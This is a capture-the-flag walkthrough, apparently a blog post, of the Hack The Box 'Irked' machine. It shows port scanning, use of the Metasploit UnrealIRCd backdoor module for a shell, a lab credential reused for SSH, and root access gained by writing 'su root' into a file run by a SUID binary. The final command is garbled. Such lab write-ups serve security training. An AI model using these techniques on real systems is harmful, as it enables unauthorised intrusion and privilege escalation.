HTB Irked — Walkthrough

So let’s start enumeration with nmap scan

root@ArmourInfosec:~/ nmap -sV -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
52816/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

we found the port 80 open so lets have a visit there

we got nothing except an image and a line that “IRC is almost working”

it’s a hint that there is something in irc but the image also look suspicious so i downloaded it and tried various methods and noticed that when i used steghide and entered blank passphrase it shows something strange

root@ArmourInfosec:~/ steghide extract -sf irked.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!

OK now let’s look at another part that is IRC, I will use hexchat to join irc and see if it is authenticated or not, type hexchat in your terminal then click on add fill ip/port and click connect and yes it is not authenticated

A strange thing i noticed here is that the irc version is outdated Unrealircd3.2.8.1 so i searched it on google and found a metasploit exploit for it, I fired up my metasploit selected the exploit exploit/unix/irc/unreal_ircd_3281_backdoor fill all information needed and run the exploit

and we got the shell

so we go to /home/djmardov directory and inside Documents there are two files user.txt and .backup

we can’t open user.txt because we don’t have privileges so we open .backup

cat .backup
UPupDOWNdownLRlrBAbaSSss

OK so using that we can extract the pass.txt file from irked.jpg

let’s try to login user with this password

djmardov:Kab6h+m+bbp2J:HG

ssh djmardov@10.10.10.117

now I simply read the user.txt file and started enumeration for privilege escalation

OK so i looked for binaries with the SUID or GUID bits set

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null

and found that a binary /usr/bin/viewuser, when we run the binary it runs a command sh -c /tmp/listusers

so i manipulated the input and wrote su root in the listusers file at /tmp and then just run

echo “su root”> /tmp/listusers && chmod 777 listusers/usr/bin/viewuser

and you will get root

What really happened???

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Thank you for reading!

--

--

--

Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium

FORGE — HackTheBox WriteUp

Hacker101 Micro-CMS v1 CTF Walkthrough

Meow HackTheBox Ctf

[CTF] 1337up CTF writeup- Mirage